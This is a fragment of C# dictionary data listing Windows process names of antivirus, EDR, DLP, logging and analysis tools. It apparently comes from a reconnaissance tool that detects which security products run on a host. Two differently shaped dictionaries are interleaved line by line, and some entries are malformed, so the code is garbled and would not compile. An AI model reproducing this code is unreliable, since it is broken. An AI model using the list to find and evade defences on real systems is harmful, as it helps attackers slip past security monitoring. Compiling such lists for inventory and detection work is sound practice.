{"MSASCuiL.exe" , "Windows Defender AV"}, { "Ad-Aware Total Security by Lavasoft", new HashSet<string>() { "ffcachetool.exe", "avktray.exe", "gdsc.exe", "bootcdwizard.exe", "avkservice.exe", "ask.exe", "avkwctlx64.exe", "gdfwadmin.exe", "avktuner.exe", "initinst.exe", "gdfwsvc.exe", "avk.exe", "avkwscpe.exe", "avkwctl.exe", "avktunerservice.exe", "mkisofs.exe", "gdfirewalltray.exe", "initinstx64.exe", "gdgadgetinst32.exe", "gdfwsvcx64.exe", "aawtray.exe", } },
{"msmpeng.exe" , "Windows Defender AV"}, { "AhnLab-V3", new HashSet<string>() { "aup80if.ex", "v3ui.exe", "v3medic.exe", "v3lite.exe", "v3l4cli.exe", } },
{"msmpsvc.exe" , "Windows Defender AV"}, { "Antiy-AVL", new HashSet<string>() { "avl.exe", } },
{"WRSA.exe" , "WebRoot AV"}, { "Arcabit", new HashSet<string>() { "arcavir.exe", "arcaconfsv.exe", "arcabit.core.loggingservice.exe", "arcabit.core.configurator2.exe", "arcabit.exe", } },
{"savservice.exe" , "Sophos AV"}, { "Avast Antivirus", new HashSet<string>() { "avastui.exe", } },
{"TMCCSF.exe" , "Trend Micro AV"}, { "Avast", new HashSet<string>() { "avast-antivirus.exe", "avastsvc.exe", "ashserv.exe", } },
{"symantec antivirus.exe" , "Symantec AV"}, { "Avira", new HashSet<string>() { "avira.webapphost.exe", } },
{"mbae.exe" , "MalwareBytes Anti-Exploit"}, { "Baidu", new HashSet<string>() { "bav.exe", "bavcloud.exe", "bavhm.exe", "bavsvc.exe", "bavtray.exe", "bavupdater.exe", "bavbsreport.exe", } },
{"parity.exe" , "Bit9 application whitelisting"}, { "BitDefender", new HashSet<string>() { "epprotectedservice.exe", "epsecurityservice.exe", "epupdateservice.exe", "epupdateserver.exe", "bdagent.exe", } },
{"cb.exe" , "Carbon Black behavioral analysis"}, { "Bkav Pro", new HashSet<string>() { "bkavutil.exe", "bkav.exe", "bkavpro.exe", "bkavservice.exe", } },
{"bds-vision.exe" , "BDS Vision behavioral analysis"}, { "CMC", new HashSet<string>() { "cmcpanel.exe", "cmccore.exe", "cmctrayicon.exe", } },
{"Triumfant.exe" , "Triumfant behavioral analysis"}, { "Cisco", new HashSet<string>() { "sfc.exe", } },
{"CSFalcon.exe" , "CrowdStrike Falcon EDR"}, { "ClamAV", new HashSet<string>() { "clamscan.exe", "freshclam.exe", } },
{"ossec.exe" , "OSSEC intrusion detection"}, { "Comodo", new HashSet<string>() { "cavwp.exe", "cfp.exe", } },
{"TmPfw.exe" , "Trend Micro firewall"}, { "CrowdStrike Falcon", new HashSet<string>() { "falconsensorwinos.exe", } },
{"dgagent.exe" , "Verdasys Digital Guardian DLP"}, { "Cybereason", new HashSet<string>() { "cybereasonransomfreeservicehost.exe", } },
{"kvoop.exe" , " DLP process" }, { "Cylance", new HashSet<string>() { "cylancesvc.exe", } },
{"AAWTray.exe" , ""}, { "Cynet", new HashSet<string>() { "cynet.exe", "cexplore.exe", "cynet.zerologondetector.exe", } },
{"ackwin32.exe" , ""}, { "Cyradar", new HashSet<string>() { "cyradarexecutorservices.exe", "cyradaredr.exe", "cyradares.exe", } },
{"Ad-Aware.exe" , ""}, { "DrWeb", new HashSet<string>() { "dwscancl.exe", "drwebsettingprocess.exe", "dwsysinfo.exe", "drwupsrv.exe", "dwnetfilter.exe", "dwscanner.exe", "dwservice.exe", "frwl_notify.exe", "frwl_svc.exe", "spideragent.exe", "spideragent_adm.exe", } },
{"adaware.exe" , ""}, { "ESET-NOD32", new HashSet<string>() { "eraagent.exe", "shouldiremoveit.com", "ecmd.exe", "egui.exe", } },
{"advxdwin.exe" , ""}, { "F-Secure", new HashSet<string>() { "fsav32.exe", "fsdfwd.exe", "fsguiexe.exe", "fsav.exe", } },
{"agentsvr.exe" , ""}, { "G Data AntiVirus", new HashSet<string>() { "bootcdwizard.exe", "avkservice.exe", "avktray.exe", "gdgadgetinst32.exe", "ransomwareremovalhelper.exe", "gdlog.exe", "sec.exe", "avkwctlx64.exe", "updategui.exe", "avk.exe", "autorundelayloader.exe", "avkcmd.exe", "avkwscpe.exe", "iupdateavk.exe", } },
{"agentw.exe" , ""}, { "GridinSoft Anti-Malware", new HashSet<string>() { "uninst.exe", "gtkmgmtc.exe", "tkcon.exe", "unpacker.exe", } },
{"alertsvc.exe" , ""}, { "IObit Malware Fighter 3", new HashSet<string>() { "imfantivirususb.exe", "actioncenterdownloader.exe", "adsremovalsetup.exe", "feedback.exe", "iobituninstal.exe", "sendbugreport.exe", "imf_iobitdel.exe", "imfantivirustips.exe", "promote.exe", "imfupdater.exe", "imf_actioncenterdownloader.exe", "imfregister.exe", "reprocess.exe", "imfsrv_iobitdel.exe", "liveupdate.exe", "xmaspromote.exe", "spsetup.exe", "imf_downconfig.exe", "uninstallpromote.exe", "bluebirdinit.exe", "imftips.exe", "locallang.exe", "imfinstaller.exe", "aupdate.exe", "startmenu.exe", "iwsimfxp.exe", "ppuninstaller.exe", "taskschedule.exe", "fixplugin.exe", "imfantivirusfix.exe", "imfbigupgrade.exe", "imftips_iobitdel.exe", "imfsrv.exe", "iobitcommunities.exe", "autoupdate.exe", "unins000.exe", "homepage.exe", } },
{"alevir.exe" , ""}, { "IObit Malware Fighter 6", new HashSet<string>() { "iwsimf_av.exe", "imfantivirususb.exe", "feedback.exe", "sendbugreportnew.exe", "ransomware.exe", "imfantivirustips.exe", "imfdbupdatestat.exe", "imf_actioncenterdownloader.exe", "iwsimf.exe", "browserprotect.exe", "driverscan.exe", "imfregister.exe", "reprocess.exe", "liveupdate.exe", "christmas.exe", "bf.exe", "imf_downconfig.exe", "browsercleaner.exe", "antitracking.exe", "bluebirdinit.exe", "imftips.exe", "imfinstaller.exe", "locallang.exe", "carescan.exe", "imfsrvwsc.exe", "safebox.exe", "aupdate.exe", "iobitliveupdate.exe", "imfchecker.exe", "iwsimfxp.exe", "ppuninstaller.exe", "imfantivirusfix.exe", "imfbigupgrade.exe", "exclusivepsimf.exe", "imfanalyzer.exe", "bfimf.exe", "imfsrv.exe", "autoupdate.exe", "spinit.exe", "homepage.exe", "dugtrio.exe", } },
{"alogserv.exe" , ""}, { "IObit Security 360", new HashSet<string>() { "is360tray.exe", "is360init.exe", "is360srv.exe", "e_privacysweeper.exe", "a_hijackscan.exe", "g_portable.exe", "d_powerfuldelete.exe", "b_securityholes.exe", "is360updater.exe", "unins000.exe", "f_pctuneup.exe", "imf_freesoftwaredownloader.exe", "c_passivedefense.exe", } },
{"amon9x.exe" , ""}, { "K7AntiVirus Plus by K7 Computing Pvt Ltd", new HashSet<string>() { "healthmon.exe", "k7avqrnt.exe", "k7tliehistory.exe", "k7tlusbvaccine.exe", "k7tsalrt.exe", "k7tlwintemp.exe", "k7tlinettemp.exe", "k7tshlpr.exe", "k7disinfectorgui.exe", "k7tlvirtkey.exe", "k7tlmtry.exe", "k7fwsrvc.exe", "k7tsecurity.exe", "k7avmscn.exe", "k7ctscan.exe", "k7tsecurityuninstall.exe", "k7rtscan.exe", "k7avscan.exe", "k7crvsvc.exe", "k7tsdbg.exe", "k7emlpxy.exe", } },
{"anti-trojan.exe" , ""}, { "K7AntiVirus Premium by K7 Computing Pvt Ltd", new HashSet<string>() { "k7quervarcleaningtool.exe", "k7ndfhlpr.exe", "healthmon.exe", "k7avqrnt.exe", "k7tliehistory.exe", "k7tlusbvaccine.exe", "k7tsstart.exe", "k7tsalrt.exe", "k7tlwintemp.exe", "k7mebezatencremovaltool.exe", "k7tlinettemp.exe", "k7tsmain.exe", "k7tshlpr.exe", "k7tssplh.exe", "k7disinfectorgui.exe", "k7tlvirtkey.exe", "k7tlmtry.exe", "k7fwsrvc.exe", "k7tsreminder.exe", "k7tsecurity.exe", "k7avmscn.exe", "k7ctscan.exe", "k7rtscan.exe", "k7tsnews.exe", "k7avscan.exe", "k7crvsvc.exe", "k7emlpxy.exe", "k7tsupdt.exe", } },
{"antivirus.exe" , ""}, { "Kaspersky Anti-Ransomware Tool for Business", new HashSet<string>() { "anti_ransom_gui.exe", "dump_writer_agent.exe", "anti_ransom.exe", } },
{"ants.exe" , ""}, { "Kaspersky Anti-Virus 2011", new HashSet<string>() { "kldw.exe", } },
{"apimonitor.exe" , ""}, { "Kaspersky Anti-Virus 2013", new HashSet<string>() { "ffcert.exe", } },
{"aplica32.exe" , ""}, { "Kaspersky Anti-Virus Personal", new HashSet<string>() { "kavsend.exe", "kavsvc.exe", "getsysteminfo.exe", "uninstall.exe", } },
{"apvxdwin.exe" , ""}, { "Kaspersky Antivirus", new HashSet<string>() { "avp.exe", } },
{"arr.exe" , ""}, { "Kaspersky", new HashSet<string>() { "klnagent.exe", } },
{"atcon.exe" , ""}, { "Malwarebytes", new HashSet<string>() { "mbam.exe", "mbar.exe", "mbae.exe", } },
{"atguard.exe" , ""}, { "McAfee All Access AntiVirus Plus", new HashSet<string>() { "compatibilitytester.exe", "mispreg.exe", "mcods.exe", "mcvsmap.exe", "mcocrollback.exe", "mpfalert.exe", "mcvulalert.exe", "mvsinst.exe", "mcupdmgr.exe", "mcpvtray.exe", "mcvuladmagnt.exe", "mcvulunpk.exe", "qcshm.exe", "mcoemmgr.exe", "qcconsol.exe", "mcuihost.exe", "mcvsshld.exe", "mcinstru.exe", "mcvulcon.exe", "mcsync.exe", "firesvc.exe", "qccons32.exe", "mcsvrcnt.exe", "mcvulusragnt.exe", "shrcl.exe", "mcodsscan.exe", "mcapexe.exe", "mcautoreg.exe", "mcinfo.exe", "mcvulctr.exe", "svcdrv.exe", } },
{"atro55en.exe" , ""}, { "McAfee AntiSpyware", new HashSet<string>() { "msssrv.exe", "mcspy.exe", "msscli.exe", } },
{"atupdater.exe" , ""}, { "McAfee AntiVirus Plus", new HashSet<string>() { "mispreg.exe", "mcvsmap.exe", "mcods.exe", "mcactinst.exe", "mcocrollback.exe", "mpfalert.exe", "mcinsupd.exe", "langsel.exe", "mvsinst.exe", "mcshell.exe", "mfehidin.exe", "mchlp32.exe", "mcupdmgr.exe", "saupd.exe", "uninstall.exe", "mcawfwk.exe", "qcshm.exe", "mcsacore.exe", "mcoemmgr.exe", "qcconsol.exe", "mcuihost.exe", "mcinstru.exe", "mcvsshld.exe", "mcoobeof.exe", "mcsync.exe", "firesvc.exe", "qccons32.exe", "saui.exe", "mcsvrcnt.exe", "shrcl.exe", "mcsmtfwk.exe", "mcautoreg.exe", "mcuninst.exe", "mcinfo.exe", "actutil.exe", } },
{"atwatch.exe" , ""}, { "McAfee Antivirus", new HashSet<string>() { "mcafee.exe", } },
{"au.exe" , ""}, { "NANO Antivirus beta by Nano Security Ltd", new HashSet<string>() { "nanoreportc64.exe", "nanorst.exe", "uninstall.exe", "nanoreport.exe", "nanosvc.exe", "nanoav64.exe", "nanoreportc.exe", } },
{"aupdate.exe" , ""}, { "NANO-Antivirus", new HashSet<string>() { "nanoav.exe", } },
{"auto-protect.nav80try.exe", ""}, { "Norton Antivirus", new HashSet<string>() { "nortonsecurity.exe", } },
{"autodown.exe" , ""}, { "PCMatic", new HashSet<string>() { "pcmaticpushcontroller.exe", "pcmaticrt.exe", } },
{"autoruns.exe" , ""}, { "Panda Security", new HashSet<string>() { "psanhost.exe", } },
{"autorunsc.exe" , ""}, { "Panda", new HashSet<string>() { "avengine.exe", } },
{"autotrace.exe" , ""}, { "Quick Heal AntiVirus Pro", new HashSet<string>() { "delnboot.exe", "0000007c_afupdfny.exe", "asmain.exe", "asclsrvc.exe", "acappaa.exe", "activate.exe", } },
{"autoupdate.exe" , ""}, { "Quick Heal Total Security", new HashSet<string>() { "delnboot.exe", "contact.exe", "activate.exe", "acappaa.exe", } },
{"avconsol.exe" , ""}, { "Sophos Anti-Rootkit 1.5.0", new HashSet<string>() { "helper.exe", "svrtcli.exe", "sctcleanupservice.exe", "native.exe", "svrtservice.exe", "svrtgui.exe", "sarcli.exe", "sctboottasks.exe", } },
{"ave32.exe" , ""}, { "Sophos Anti-Virus", new HashSet<string>() { "sav32cli.exe", "savprogress.exe", "savservice.exe", "native.exe", "swi_di.exe", "backgroundscanclient.exe", "savmain.exe", "forceupdatealongsidesgn.exe", "swc_service.exe", "savproxy.exe", "savcleanupservice.exe", "savadminservice.exe", } },
{"avgcc32.exe" , ""}, { "Symantec Endpoint Protection", new HashSet<string>() { "ccsvchst.exe", } },
{"avgctrl.exe" , ""}, { "Symantec", new HashSet<string>() { "sepwscsvc64.exe", } },
{"avgemc.exe" , ""}, { "Total Defense Anti-Virus", new HashSet<string>() { "caoscheck.exe", "ccprovsp.exe", "caschelp.exe", "caisstutorial.exe", "ccwatcher.exe", "cawsc.exe", "ccevtmgr.exe", "ccprovep.exe", "casc.exe", "cclogconfig.exe", "ccschedulersvc.exe", "cckasubmit.exe", "ccproxysrvc.exe", "caunst.exe", } },
{"avgnt.exe" , ""}, { "Trend micro", new HashSet<string>() { "uiwinmgr.exe", "ntrtscan.exe", "tmntsrv.exe", "pccpfw.exe", } },
{"avgrsx.exe" , ""}, { "VIPRE Advanced Security by ThreatTrack Security", new HashSet<string>() { "sbamtray.exe", "sbamwsc.exe", "sbamcommandlinescanner.exe", "sbamcreaterestore.exe", "sbamsvc.exe", "avcproxy.exe", "sbbd.exe", } },
{"avgserv.exe" , ""}, { "VIPRE Antivirus by GFI Software", new HashSet<string>() { "sbamtray.exe", "sbsetupdrivers.exe", "sbamsafemodeui.exe", "sbpimsvc.exe", "sbamwsc.exe", "sbrc.exe", "sfe.exe", "sbagentdiagnostictool.exe", "sbamcommandlinescanner.exe", "sbamsvc.exe", "sbamcreaterestore.exe", "sbamui.exe", } },
{"avgserv9.exe" , ""}, { "ViRobot Anti-Ransomware by HAURI", new HashSet<string>() { "vrbbdsvc.exe", "uninstall.exe", "vrbbdlogviewer.exe", "vrbbdbackup.exe", "vrpuller.exe", } },
{"avguard.exe" , ""}, { "ViRobot Internet Security 2011 by HAURI", new HashSet<string>() { "hvrpcuselock.exe", "hvrlogview.exe", "hvreasyrobot.exe", "hvrsetup.exe", "hvrfilewipe.exe", "hvrmalsvc.exe", "hvrtrafficviewer.exe", "hvrscan.exe", "hvrcontain.exe", "hvrquarantview.exe", "hvrtray.exe", } },
{"avgwdsvc.exe" , ""}, { "Webroot", new HashSet<string>() { "wrsa.exe", } },
{"avgui.exe" , ""}, { "Windows defender", new HashSet<string>() { "msmpeng.exe", "mpcmdrun.exe", "msascuil.exe", "windefend.exe", "msascui.exe", "msmpsvc.exe", } },
{"avgw.exe" , ""}, { "Zillya Internet Security by ALLIT Service", new HashSet<string>() { "drvcmd.exe", "ziscore.exe", "keyboard.exe", "systemresearchtool.exe", "zis.exe", "zisnet.exe", "conscan.exe", "zisupdater.exe", "zisaux.exe", "ziships.exe", } },
{"avkpop.exe" , ""}, { "Zillya! Antivirus by ALLIT Service", new HashSet<string>() { "wscmgr.exe", "drvcmd.exe", "zillya.exe", "zavaux.exe", "reporter.exe", "autoruntool.exe", "taskmanagertool.exe", } },
{"avkserv.exe" , ""}, { "Zillya! Internet Security by ALLIT Service", new HashSet<string>() { "restoretool.exe", "drvcmd.exe", "wscmgr.exe", "zefcore.exe", "zefsvc.exe", "fwdisabler.exe", "zefaux.exe", "backuphostfile.exe", "conscanner.exe", "reporter.exe", "autoruntool.exe", "zef.exe", "taskmanagertool.exe", } },
{"avkservice.exe" , ""}, { "ZoneAlarm Anti-Ransomware by Check Point Software", new HashSet<string>() { "zup.exe", "consrvhost.exe", "zaarupdateservice.exe", "zaar.exe", "sbacipollasrvhost.exe", "uninst.exe", } },
{"avkwctl9.exe" , ""}, { "ZoneAlarm Antivirus by Check Point, Inc", new HashSet<string>() { "threatemulation.exe", "multiscan.exe", "restoreutility.exe", "vsmon.exe", "zatray.exe", "multifix.exe", } },
{"avltmain.exe" , ""}, { "ZoneAlarm by Check Point, Inc", new HashSet<string>() { "instmtdr.exe", "zatutor.exe", "cpes_clean.exe", "multiscan.exe", "zauninst.exe", "zlclient.exe", "multifix.exe", } }
{"avnt.exe" , ""},
{"avp.exe" , ""},
{"avp32.exe" , ""},
{"avpcc.exe" , ""},
{"avpdos32.exe" , ""},
{"avpm.exe" , ""},
{"avptc32.exe" , ""},
{"avpupd.exe" , ""},
{"avsched32.exe" , ""},
{"avsynmgr.exe" , ""},
{"avwin.exe" , ""},
{"avwin95.exe" , ""},
{"avwinnt.exe" , ""},
{"avwupd.exe" , ""},
{"avwupd32.exe" , ""},
{"avwupsrv.exe" , ""},
{"avxmonitor9x.exe" , ""},
{"avxmonitornt.exe" , ""},
{"avxquar.exe" , ""},
{"backweb.exe" , ""},
{"bargains.exe" , ""},
{"bd_professional.exe" , ""},
{"beagle.exe" , ""},
{"belt.exe" , ""},
{"bidef.exe" , ""},
{"bidserver.exe" , ""},
{"bipcp.exe" , ""},
{"bipcpevalsetup.exe" , ""},
{"bisp.exe" , ""},
{"blackd.exe" , ""},
{"blackice.exe" , ""},
{"blink.exe" , ""},
{"blss.exe" , ""},
{"bootconf.exe" , ""},
{"bootwarn.exe" , ""},
{"borg2.exe" , ""},
{"bpc.exe" , ""},
{"brasil.exe" , ""},
{"bs120.exe" , ""},
{"bundle.exe" , ""},
{"bvt.exe" , ""},
{"ccapp.exe" , ""},
{"ccevtmgr.exe" , ""},
{"ccpxysvc.exe" , ""},
{"ccSvcHst.exe" , ""},
{"cdp.exe" , ""},
{"cfd.exe" , ""},
{"cfgwiz.exe" , ""},
{"cfiadmin.exe" , ""},
{"cfiaudit.exe" , ""},
{"cfinet.exe" , ""},
{"cfinet32.exe" , ""},
{"claw95.exe" , ""},
{"claw95cf.exe" , ""},
{"clean.exe" , ""},
{"cleaner.exe" , ""},
{"cleaner3.exe" , ""},
{"cleanpc.exe" , ""},
{"cleanup.exe" , ""},
{"click.exe" , ""},
{"cmdagent.exe" , ""},
{"cmesys.exe" , ""},
{"cmgrdian.exe" , ""},
{"cmon016.exe" , ""},
{"connectionmonitor.exe" , ""},
{"cpd.exe" , ""},
{"cpf9x206.exe" , ""},
{"cpfnt206.exe" , ""},
{"ctrl.exe" , ""},
{"cv.exe" , ""},
{"cwnb181.exe" , ""},
{"cwntdwmo.exe" , ""},
{"CylanceUI.exe" , ""},
{"CyProtect.exe" , ""},
{"CyUpdate.exe" , ""},
{"cyserver.exe" , ""},
{"cytray.exe" , ""},
{"CyveraService.exe" , ""},
{"datemanager.exe" , ""},
{"dcomx.exe" , ""},
{"defalert.exe" , ""},
{"defscangui.exe" , ""},
{"defwatch.exe" , ""},
{"deputy.exe" , ""},
{"divx.exe" , ""},
{"dgprompt.exe" , ""},
{"DgService.exe" , ""},
{"dllcache.exe" , ""},
{"dllreg.exe" , ""},
{"doors.exe" , ""},
{"dpf.exe" , ""},
{"dpfsetup.exe" , ""},
{"dpps2.exe" , ""},
{"drwatson.exe" , ""},
{"drweb32.exe" , ""},
{"drwebupw.exe" , ""},
{"dssagent.exe" , ""},
{"dumpcap.exe" , ""},
{"dvp95.exe" , ""},
{"dvp95_0.exe" , ""},
{"ecengine.exe" , ""},
{"efpeadm.exe" , ""},
{"egui.exe" , ""},
{"ekrn.exe" , ""},
{"emet_agent.exe" , ""},
{"emet_service.exe" , ""},
{"emsw.exe" , ""},
{"engineserver.exe" , ""},
{"ent.exe" , ""},
{"esafe.exe" , ""},
{"escanhnt.exe" , ""},
{"escanv95.exe" , ""},
{"espwatch.exe" , ""},
{"ethereal.exe" , ""},
{"etrustcipe.exe" , ""},
{"evpn.exe" , ""},
{"exantivirus-cnet.exe" , ""},
{"exe.avxw.exe" , ""},
{"expert.exe" , ""},
{"explore.exe" , ""},
{"f-agnt95.exe" , ""},
{"f-prot.exe" , ""},
{"f-prot95.exe" , ""},
{"f-stopw.exe" , ""},
{"fameh32.exe" , ""},
{"fast.exe" , ""},
{"fch32.exe" , ""},
{"fcagswd.exe" , "McAfee DLP Agent"},
{"fcags.exe" , "McAfee DLP Agent"},
{"fih32.exe" , ""},
{"findviru.exe" , ""},
{"firesvc.exe" , "McAfee Host Intrusion Prevention"},
{"firetray.exe" , ""},
{"firewall.exe" , ""},
{"fnrb32.exe" , ""},
{"fp-win.exe" , ""},
{"fp-win_trial.exe" , ""},
{"fprot.exe" , ""},
{"frameworkservice.exe" , ""},
{"frminst.exe" , ""},
{"frw.exe" , ""},
{"fsaa.exe" , ""},
{"fsav.exe" , ""},
{"fsav32.exe" , ""},
{"fsav530stbyb.exe" , ""},
{"fsav530wtbyb.exe" , ""},
{"fsav95.exe" , ""},
{"fsgk32.exe" , ""},
{"fsm32.exe" , ""},
{"fsma32.exe" , ""},
{"fsmb32.exe" , ""},
{"gator.exe" , ""},
{"gbmenu.exe" , ""},
{"gbpoll.exe" , ""},
{"generics.exe" , ""},
{"gmt.exe" , ""},
{"guard.exe" , ""},
{"guarddog.exe" , ""},
{"hacktracersetup.exe" , ""},
{"hbinst.exe" , ""},
{"hbsrv.exe" , ""},
{"HijackThis.exe" , ""},
{"hipsvc.exe" , ""},
{"HipMgmt.exe" , "McAfee Host Intrusion Protection"},
{"hotactio.exe" , ""},
{"hotpatch.exe" , ""},
{"htlog.exe" , ""},
{"htpatch.exe" , ""},
{"hwpe.exe" , ""},
{"hxdl.exe" , ""},
{"hxiul.exe" , ""},
{"iamapp.exe" , ""},
{"iamserv.exe" , ""},
{"iamstats.exe" , ""},
{"ibmasn.exe" , ""},
{"ibmavsp.exe" , ""},
{"icload95.exe" , ""},
{"icloadnt.exe" , ""},
{"icmon.exe" , ""},
{"icsupp95.exe" , ""},
{"icsuppnt.exe" , ""},
{"idle.exe" , ""},
{"iedll.exe" , ""},
{"iedriver.exe" , ""},
{"iface.exe" , ""},
{"ifw2000.exe" , ""},
{"inetlnfo.exe" , ""},
{"infus.exe" , ""},
{"infwin.exe" , ""},
{"init.exe" , ""},
{"intdel.exe" , ""},
{"intren.exe" , ""},
{"iomon98.exe" , ""},
{"istsvc.exe" , ""},
{"jammer.exe" , ""},
{"jdbgmrg.exe" , ""},
{"jedi.exe" , ""},
{"kavlite40eng.exe" , ""},
{"kavpers40eng.exe" , ""},
{"kavpf.exe" , ""},
{"kazza.exe" , ""},
{"keenvalue.exe" , ""},
{"kerio-pf-213-en-win.exe" , ""},
{"kerio-wrl-421-en-win.exe" , ""},
{"kerio-wrp-421-en-win.exe" , ""},
{"kernel32.exe" , ""},
{"KeyPass.exe" , ""},
{"killprocesssetup161.exe" , ""},
{"launcher.exe" , ""},
{"ldnetmon.exe" , ""},
{"ldpro.exe" , ""},
{"ldpromenu.exe" , ""},
{"ldscan.exe" , ""},
{"lnetinfo.exe" , ""},
{"loader.exe" , ""},
{"localnet.exe" , ""},
{"lockdown.exe" , ""},
{"lockdown2000.exe" , ""},
{"lookout.exe" , ""},
{"lordpe.exe" , ""},
{"lsetup.exe" , ""},
{"luall.exe" , ""},
{"luau.exe" , ""},
{"lucomserver.exe" , ""},
{"luinit.exe" , ""},
{"luspt.exe" , ""},
{"mapisvc32.exe" , ""},
{"masvc.exe" , "McAfee Agent"},
{"mbamservice.exe" , ""},
{"mcafeefire.exe" , ""},
{"mcagent.exe" , ""},
{"mcmnhdlr.exe" , ""},
{"mcscript.exe" , ""},
{"mcscript_inuse.exe" , ""},
{"mctool.exe" , ""},
{"mctray.exe" , ""},
{"mcupdate.exe" , ""},
{"mcvsrte.exe" , ""},
{"mcvsshld.exe" , ""},
{"md.exe" , ""},
{"mfeann.exe" , "McAfee VirusScan Enterprise"},
{"mfemactl.exe" , "McAfee VirusScan Enterprise"},
{"mfevtps.exe" , ""},
{"mfin32.exe" , ""},
{"mfw2en.exe" , ""},
{"mfweng3.02d30.exe" , ""},
{"mgavrtcl.exe" , ""},
{"mgavrte.exe" , ""},
{"mghtml.exe" , ""},
{"mgui.exe" , ""},
{"minilog.exe" , ""},
{"minionhost.exe" , ""},
{"mmod.exe" , ""},
{"monitor.exe" , ""},
{"moolive.exe" , ""},
{"mostat.exe" , ""},
{"mpfagent.exe" , ""},
{"mpfservice.exe" , ""},
{"mpftray.exe" , ""},
{"mrflux.exe" , ""},
{"msapp.exe" , ""},
{"msbb.exe" , ""},
{"msblast.exe" , ""},
{"mscache.exe" , ""},
{"msccn32.exe" , ""},
{"mscman.exe" , ""},
{"msconfig.exe" , ""},
{"msdm.exe" , ""},
{"msdos.exe" , ""},
{"msiexec16.exe" , ""},
{"msinfo32.exe" , ""},
{"mslaugh.exe" , ""},
{"msmgt.exe" , ""},
{"msmsgri32.exe" , ""},
{"MsSense.exe" , "Microsoft Defender ATP"},
{"mssmmc32.exe" , ""},
{"mssys.exe" , ""},
{"msvxd.exe" , ""},
{"mu0311ad.exe" , ""},
{"mwatch.exe" , ""},
{"n32scanw.exe" , ""},
{"naprdmgr.exe" , ""},
{"nav.exe" , ""},
{"navap.navapsvc.exe" , ""},
{"navapsvc.exe" , ""},
{"navapw32.exe" , ""},
{"navdx.exe" , ""},
{"navlu32.exe" , ""},
{"navnt.exe" , ""},
{"navstub.exe" , ""},
{"navw32.exe" , ""},
{"navwnt.exe" , ""},
{"nc2000.exe" , ""},
{"ncinst4.exe" , ""},
{"ndd32.exe" , ""},
{"neomonitor.exe" , ""},
{"neowatchlog.exe" , ""},
{"netarmor.exe" , ""},
{"netd32.exe" , ""},
{"netinfo.exe" , ""},
{"netmon.exe" , ""},
{"netscanpro.exe" , ""},
{"netspyhunter-1.2.exe" , ""},
{"netstat.exe" , ""},
{"netutils.exe" , ""},
{"nisserv.exe" , ""},
{"nisum.exe" , ""},
{"nmain.exe" , ""},
{"nod32.exe" , ""},
{"normist.exe" , ""},
{"norton_internet_secu_3.0_407.exe" , ""},
{"notstart.exe" , ""},
{"npf40_tw_98_nt_me_2k.exe" , ""},
{"npfmessenger.exe" , ""},
{"nprotect.exe" , ""},
{"npscheck.exe" , ""},
{"npssvc.exe" , ""},
{"nsched32.exe" , ""},
{"nssys32.exe" , ""},
{"nstask32.exe" , ""},
{"nsupdate.exe" , ""},
{"nt.exe" , ""},
{"ntrtscan.exe" , ""},
{"ntvdm.exe" , ""},
{"ntxconfig.exe" , ""},
{"nui.exe" , ""},
{"nupgrade.exe" , ""},
{"nvarch16.exe" , ""},
{"nvc95.exe" , ""},
{"nvsvc32.exe" , ""},
{"nwinst4.exe" , ""},
{"nwservice.exe" , ""},
{"nwtool16.exe" , ""},
{"nxlog.exe" , ""},
{"ollydbg.exe" , ""},
{"onsrvr.exe" , ""},
{"optimize.exe" , ""},
{"ostronet.exe" , ""},
{"osqueryd.exe" , ""},
{"otfix.exe" , ""},
{"outpost.exe" , ""},
{"outpostinstall.exe" , ""},
{"outpostproinstall.exe" , ""},
{"padmin.exe" , ""},
{"panixk.exe" , ""},
{"patch.exe" , ""},
{"pavcl.exe" , ""},
{"pavproxy.exe" , ""},
{"pavsched.exe" , ""},
{"pavw.exe" , ""},
{"pccwin98.exe" , ""},
{"pcfwallicon.exe" , ""},
{"pcip10117_0.exe" , ""},
{"pcscan.exe" , ""},
{"pdsetup.exe" , ""},
{"periscope.exe" , ""},
{"persfw.exe" , ""},
{"perswf.exe" , ""},
{"pf2.exe" , ""},
{"pfwadmin.exe" , ""},
{"pgmonitr.exe" , ""},
{"pingscan.exe" , ""},
{"platin.exe" , ""},
{"pop3trap.exe" , ""},
{"poproxy.exe" , ""},
{"popscan.exe" , ""},
{"portdetective.exe" , ""},
{"portmonitor.exe" , ""},
{"powerscan.exe" , ""},
{"ppinupdt.exe" , ""},
{"pptbc.exe" , ""},
{"ppvstop.exe" , ""},
{"prizesurfer.exe" , ""},
{"prmt.exe" , ""},
{"prmvr.exe" , ""},
{"procdump.exe" , ""},
{"processmonitor.exe" , ""},
{"procexp.exe" , ""},
{"procexp64.exe" , ""},
{"procexplorerv1.0.exe" , ""},
{"procmon.exe" , ""},
{"programauditor.exe" , ""},
{"proport.exe" , ""},
{"protectx.exe" , ""},
{"pspf.exe" , ""},
{"purge.exe" , ""},
{"qconsole.exe" , ""},
{"qserver.exe" , ""},
{"rapapp.exe" , ""},
{"rav7.exe" , ""},
{"rav7win.exe" , ""},
{"rav8win32eng.exe" , ""},
{"ray.exe" , ""},
{"rb32.exe" , ""},
{"rcsync.exe" , ""},
{"realmon.exe" , ""},
{"reged.exe" , ""},
{"regedit.exe" , ""},
{"regedt32.exe" , ""},
{"rescue.exe" , ""},
{"rescue32.exe" , ""},
{"rrguard.exe" , ""},
{"rtvscan.exe" , ""},
{"rtvscn95.exe" , ""},
{"rulaunch.exe" , ""},
{"run32dll.exe" , ""},
{"rundll.exe" , ""},
{"rundll16.exe" , ""},
{"ruxdll32.exe" , ""},
{"safeweb.exe" , ""},
{"sahagent.exescan32.exe" , ""},
{"save.exe" , ""},
{"savenow.exe" , ""},
{"sbserv.exe" , ""},
{"scam32.exe" , ""},
{"scan32.exe" , ""},
{"scan95.exe" , ""},
{"scanpm.exe" , ""},
{"scrscan.exe" , ""},
{"SentinelOne.exe" , ""},
{"serv95.exe" , ""},
{"setupvameeval.exe" , ""},
{"setup_flowprotector_us.exe", ""},
{"sfc.exe" , ""},
{"sgssfw32.exe" , ""},
{"sh.exe" , ""},
{"shellspyinstall.exe" , ""},
{"shn.exe" , ""},
{"showbehind.exe" , ""},
{"shstat.exe" , "McAfee VirusScan Enterprise"},
{"SISIDSService.exe" , ""},
{"SISIPSUtil.exe" , ""},
{"smc.exe" , ""},
{"sms.exe" , ""},
{"smss32.exe" , ""},
{"soap.exe" , ""},
{"sofi.exe" , ""},
{"sperm.exe" , ""},
{"splunk.exe" , "Splunk"},
{"splunkd.exe" , "Splunk"},
{"splunk-admon.exe" , "Splunk"},
{"splunk-powershell.exe" , "Splunk"},
{"splunk-winevtlog.exe" , "Splunk"},
